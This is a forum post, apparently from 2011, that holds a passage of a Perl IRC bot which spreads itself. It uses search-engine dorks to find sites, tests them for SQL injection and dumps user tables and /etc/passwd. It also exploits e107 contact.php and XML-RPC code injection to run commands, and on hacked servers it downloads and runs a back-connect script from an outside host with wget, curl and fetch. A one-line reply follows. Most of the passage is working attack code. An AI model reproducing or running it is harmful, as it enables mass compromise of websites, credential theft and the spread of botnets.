getcontent($rfispd); os($rfixpl); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3RFI3)2$inj7 $os"); sendraw($IRC_cur_socket, "PRIVMSG BaMbY :3(4@3RFI3)2$inj7 $os"); } }}sub sqlscan() { my $engz = $_[0]; my $bugz = $_[1]; my $dork = $_[2]; my $contatore = 0; if ($engz =~ /GooGLe/) { my @sqlgoogle=&google($dork); push(@sqltotal, @sqlgoogle); } if ($engz =~ /AllTheWeb/) { my @sqlalltheweb=&alltheweb($dork); push(@sqltotal, @sqlalltheweb); } if ($engz =~ /Bing/) { my @sqlBing=&Bing($dork); push(@sqltotal, @sqlBing); } if ($engz =~ /ALtaViSTa/) { my @sqlaltavista=&altavista($dork); push(@sqltotal, @sqlaltavista); } if ($engz =~ /AsK/) { my @sqlask=&ask($dork); push(@sqltotal, @sqlask); } if ($engz =~ /UoL/) { my @sqluol=&uol($dork); push(@sqltotal, @sqluol); } if ($engz =~ /YahOo/) { my @sqlyahoo=&yahoo($dork); push(@sqltotal, @sqlyahoo); } my @sqlclean = &calculate(@sqltotal); if (scalar(@sqlclean) != 0) { } my $uni=scalar(@sqlclean); foreach my $sqltarget (@sqlclean) { $contatore++; if ($contatore==$uni-1){ sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3SQL3)(4@3$engz3)7 Scan Finish for7 $dork"); } my $xpl = "http://".$sqltarget.$bugz."'"; my $vuln = "http://".$sqltarget."12".$bugz."7[SQL]"; my $sqlsite = "http://".$sqltarget.$bugz; my $strona = getcontent($xpl); if ( $strona =~ m/You have an error in your SQL syntax/i || $strona =~ m/Query failed/i || $strona =~ m/SQL query failed/i ) {sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3SQL3)(2MySQL3)7 $vuln ");&sqlbrute($sqlsite);} elsif ( $strona =~ m/ODBC SQL Server Driver/i || $strona =~ m/Unclosed quotation mark/i || $strona =~ m/Microsoft OLE DB Provider for/i ) {sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3SQL3)(2MsSQL3)7 $vuln ");} elsif ( $strona =~ m/Microsoft JET Database/i || $strona =~ m/ODBC Microsoft Access Driver/i ) {sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3SQL3)(2MsAccess3)7 $vuln ");} }}sub cmde107() {my $path = $_[0];my $incmd = $_[1];my $codecmd = encode_base64($incmd);my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"))';print $cmd;$access = new LWP::UserAgent;$access->agent("Mozilla/5.0");my $req = new HTTP::Request POST => $path; $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");my $res = $access->request($req);my $data = $res->as_string;if ( $data =~ /ByroeNet(.*)/ ){ $mydata = $1;sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3e107CMD3)4 $mydata");}}sub e107scan() { my $engz = $_[0]; my $bugz = $_[1]; my $dork = $_[2]; my $contatore = 0; if ($engz =~ /GooGLe/) { my @e107google=&google($dork); push(@e107total, @e107google); } if ($engz =~ /AllTheWeb/) { my @e107alltheweb=&alltheweb($dork); push(@e107total, @e107alltheweb); } if ($engz =~ /Bing/) { my @e107Bing=&Bing($dork); push(@e107total, @e107Bing); } if ($engz =~ /ALtaViSTa/) { my @e107altavista=&altavista($dork); push(@e107total, @e107altavista); } if ($engz =~ /AsK/) { my @e107ask=&ask($dork); push(@e107total, @e107ask); } if ($engz =~ /UoL/) { my @e107uol=&uol($dork); push(@e107total, @e107uol); } if ($engz =~ /YahOo/) { my @e107yahoo=&yahoo($dork); push(@e107total, @e107yahoo); } my @e107clean = &calculate(@e107total); if (scalar(@e107clean) != 0) { } my $uni=scalar(@e107clean); foreach my $e107target (@e107clean) { $contatore++; if ($contatore==$uni-1){ sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3e1073)(4@3$engz3)7 Scan Finish for7 $dork"); } my $cmd = "echo(base64_decode(\"Vm9v\").php_uname().base64_decode(\"RG9v\"));include(base64_decode(\"aHR0cDovL3d3dy5hY3R1YWx0di5yby90eHRzcWwvZGF0YS9lPz8=\"));include(base64_decode(\"aHR0cDovL3d3dy5hY3R1YWx0di5yby90eHRzcWwvZGF0YS9lPz8=\"));"; my $ua = LWP::UserAgent->new or die; $ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)'); $ua->timeout(15); my $xpl = "http://".$e107target."/contact.php"; $xpl =~ s/\/\/contact.php/\/contact.php/g; my $req = HTTP::Request->new(POST => $xpl); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D"); my $res = $ua->request($req); my $cont = $res->content; if ($cont =~ /Voo(.*)Doo/) { my $uname = $1; $uname=~s/\n//; $uname=~s/\r//; sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3e1073)(2$xpl3)7 $uname "); &spreade107($xpl); } }}sub spreade107() {my $path = $_[0];my $incmd = "cd /tmp; fetch http://www.kidu.go.ro/dc.txt;perl dc.txt 80.191.68.147 2121; cd /tmp; wget http://www.kidu.go.ro/dc.txt;perl dc.txt 80.191.68.147 2121; cd /tmp; curl -O http://www.kidu.go.ro/dc.txt;perl dc.txt 80.191.68.147 2121; cd /tmp; lwp-download http://www.kidu.go.ro/dc.txt;perl dc.txt 80.191.68.147 2121";my $codecmd = encode_base64($incmd);my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"))';print $cmd;$access = new LWP::UserAgent;$access->agent("Mozilla/5.0");my $req = new HTTP::Request POST => $path; $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");my $res = $access->request($req);my $data = $res->as_string;if ( $data =~ /ByroeNet(.*)/ ){ $mydata = $1;sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3e107CMD3)4 $mydata");}}sub enc(){ my $md5_hash = $1; my $md5_generated = md5_hex($md5_hash); sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3md5 Encode3)2 $md5_generated");}sub dec(){ my $md5 = $1; my $crac = 'http://md5.noisette.ch/md5.php?hash='.$md5; my $found = getcontent($crac); if ($found =~ /<string><!\[CDATA\[(.*)\]\]><\/string>/) { sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3md5 Decode3)2 $1"); } else { sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3md5 Decode3)2 $1"); }}sub xmlcek {my $xmltgt = $_[0];my $userAgent = LWP::UserAgent->new(agent => 'perl post'); $exploit = "<?xml version=\"1.0\"?><methodCall>"; $exploit .= "<methodName>test.method</methodName>"; $exploit .= "<params><param><value><name>',''));"; $exploit .= "echo'j13mb0t';echo`uname -a`;echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";my $response = $userAgent->request(POST $xmltgt, Content_Type => 'text/xml', Content => $exploit);if ($response->content =~ /j13mb0t(.*)j13mb0t/s) {$os=$1;sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3XML3)(2$xmltgt3)7 $os ");sendraw($IRC_cur_socket, "PRIVMSG BaMbY :3(4@3XML3)(2$xmltgt3)7 $os ");}}sub xmlxspread() {my $xmltargt = $_[0];my $xmlsprd = $_[1];my $userAgent = LWP::UserAgent->new(agent => 'perl post'); $exploit = "<?xml version=\"1.0\"?><methodCall>"; $exploit .= "<methodName>test.method</methodName>"; $exploit .= "<params><param><value><name>',''));"; $exploit .= "echo'j13m';echo`".$xmlsprd."`;echo'b0T';exit;/*</name></value></param></params></methodCall>";my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);}sub getcontent() { my $url = $_[0]; my $req = HTTP::Request->new(GET => $url); my $ua = LWP::UserAgent->new(); $ua->timeout(15); my $response = $ua->request($req); return $response->content;}sub lfiexploit() { my $url = $_[0]; my $rce = $_[1]; my $agent = "<?php echo \"j13mb0t#\"; passthru(\'".$rce."\'); echo \"#j13mb0t\"; ?>"; my $ua = LWP::UserAgent->new(agent => $agent); $ua->timeout(15); my $req = HTTP::Request->new(GET => $url); my $response = $ua->request($req); return $response->content;}sub google(){ my @lst; my $key = $_[0]; my $b = 0; for ($b=0; $b<=1000; $b+=100){ my $Go=("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$; my $Res=query($Go); while ($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ if ($1 !~ /google/){ my $k=$1; my @grep=links($k); push(@lst,@grep); } } }return @lst;}sub SIGN() {if (($powered !~ /M/)||($mail !~ /web/)) {print "\nLamer!!! Bodoh ToloL Oon !!! Udah Gak Usah diRubah Lagi!!!\n\n"; exec("rm -rf $0 && pkill perl");}}sub alltheweb() { my @lst; my $key = $_[0]; my $b = 0; my $pg = 0; for ($b=0; $b<=1000; $b+=100) { my $all = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$; my $Res = query($all); while ( $Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g ) { my $k = $1; $k =~ s/ //g; my @grep = links($k); push( @lst, @grep ); } } return @lst;}sub uol() { my @lst; my $key = $_[0]; my $b = 0; for ($b=1; $b<=1000; $b+=10) { my $UoL = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$; my $Res = query($UoL); while ( $Res =~ m/<a href=\"http:\/\/([^>\"]*)/g ) { my $k = $1; if ( $k !~ /busca|uol|yahoo/ ) { my $k = $1; my @grep = links($k); push( @lst, @grep ); } } } return @lst;}sub Bing() { my @lst; my $key = $_[0]; my $b = 0; for ($b=1; $b<=1000; $b+=10) { my $bing = ("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$b."&FORM=PERE"); my $Res = query($bing); while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) { if ( $1 !~ /msn|live|bing/ ) { my $k = $1; my @grep = links($k); push( @lst, @grep ); } } } return @lst;}sub altavista(){ my @lst; my $key = $_[0]; my $b = 0; for ($b=1; $b<=1000; $b+=10){ my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$; my $Res=query($AlT); while ($Res=~m/<span class=ngrn>(.+?)\//g){ if ($1 !~ /altavista/){ my $k=$1; $k=~s/<//g; $k=~s/ //g; my @grep=links($k); push(@lst,@grep); } } }return @lst;}sub ask() { my @lst; my $key = $_[0]; my $b = 0; my $pg = 0; for ($b=0; $b<=1000; $b+=10) { my $Ask = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$; my $Res = query($Ask); while ($Res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) { if ($1 !~ /ask.com/){ my $k = $1; my @grep = links($k); push( @lst, @grep ); } } } return @lst;}sub yahoo() { my @lst; my $key = $_[0]; my $b = 0; for ($b=1; $b<=500; $b+=1) { my $yahoo = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$; my $Res = query($yahoo); while ($Res =~ m/26u=(.*?)%26w=/g) { if ($1 !~ /yahoo/){ my $k = $1; my @grep = links($k); push(@lst, @grep); } } } return @lst;}sub os() { my $target=$_[0]; my $re = &query($target); while ($re =~ m/<br>OSTYPE:(.+?)\<br>/g) { $os = $1; }}sub query($) {my $url = $_[0];$url =~ s/http:\/\///;my $host = $url;my $query = $url;my $page = "";$host =~ s/href=\"?http:\/\///;$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;$query =~ s/$host//;if ( $query eq "" ) { $query = "/"; }eval {my $sock = IO::Socket::INET->new(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or return;print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";my @r = <$sock>;$page = "@r";close($sock);};return $page;}sub links() { my @l; my $link = $_[0]; my $host = $_[0]; my $hdir = $_[0]; $hdir =~ s/(.*)\/[^\/]*$/\1/; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $host .= "/"; $link .= "/"; $hdir .= "/"; $host =~ s/\/\//\//g; $hdir =~ s/\/\//\//g; $link =~ s/\/\//\//g; push( @l, $link, $host, $hdir ); return @l;}sub key() { my $dork = $_[0]; $dork =~ s/ /\+/g; $dork =~ s/:/\%3A/g; $dork =~ s/\//\%2F/g; $dork =~ s/&/\%26/g; $dork =~ s/\"/\%22/g; $dork =~ s/,/\%2C/g; $dork =~ s/\\/\%5C/g; return $dork;}sub calculate { my @calculate = (); my %visti = (); foreach my $element (@_) { $element =~ s/\/+/\//g; next if $visti{$element}++; push @calculate, $element; } return @calculate;}sub sqlbrute() { my $site=$_[0]; my $columns=20;my $cfin.="--";my $cmn.= "+";for ($column = 0 ; $column < $columns ; $column ++) { $union.=','.$column; $inyection.=','."0x6c6f67696e70776e7a"; if ($column == 0) { $inyection = ''; $union = ''; } $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin; $response=get($sql); if($response =~ /loginpwnz/) { $column ++; $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin; sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3SQL3)7 $sql "); $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin; $response=get($sql)or die("[-] Impossible to get Information_Schema\n"); if($response =~ /loginpwnz/) { $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin; sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3SQL3)(2INFO_SCHEMA3)7 $sql "); } $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin; $response=get($sql)or die("[-] Impossible to get MySQL.User\n"); if($response =~ /loginpwnz/) { $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin; sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3SQL3)(2USER3)7 $sql "); } else { } while ($loadcont < $column-1) { $loadfile.=','.'load_file(0x2f6574632f706173737764)'; $loadcont++; } $sql=$site."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin; $response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n"); if($response =~ /root:x:/) { sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3SQL3)(2Load File3)7 $sql "); } else { } foreach $tabla(@tabele) { chomp($tabla); $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin; $response=get($sql)or die("[-] Impossible to get tables\n"); if($response =~ /loginpwnz/) { $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin; sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3SQL3)(2Tabel3)7 $sql "); &tabelka($site,$tabla); } } } } }sub tabelka() { my $site=$_[0]; my $tabla=$_[1]; my $cfin.="--"; my $cmn.= "+"; chomp($tabla); foreach $columna(@kolumny) { chomp($columna); $sql=$site."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin; $response=get($sql)or die("[-] Impossible to get columns\n"); if ($response =~ /loginpwnz/) { sendraw($IRC_cur_socket, "PRIVMSG $channel :3(4@3SQL3) (2SQLi Vuln3)7 $site 3(2Kolom3)7 $columna 3(2Tabel3)7 $tabla "); } }}sub nick { return unless $#_ == 0; sendraw("NICK $_[0]");}sub notice { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]");}sub join {sendraw("JOIN $_[0]");}sub part {sendraw("PART $_[0]");}sub quit {sendraw("QUIT $_[0]");exit;} Quote Link to comment Share on other sites More sharing options...
wind Posted January 3, 2011 Report Share Posted January 3, 2011 Nu cred ca mai prinzi ceva cu el .. Quote Link to comment Share on other sites More sharing options...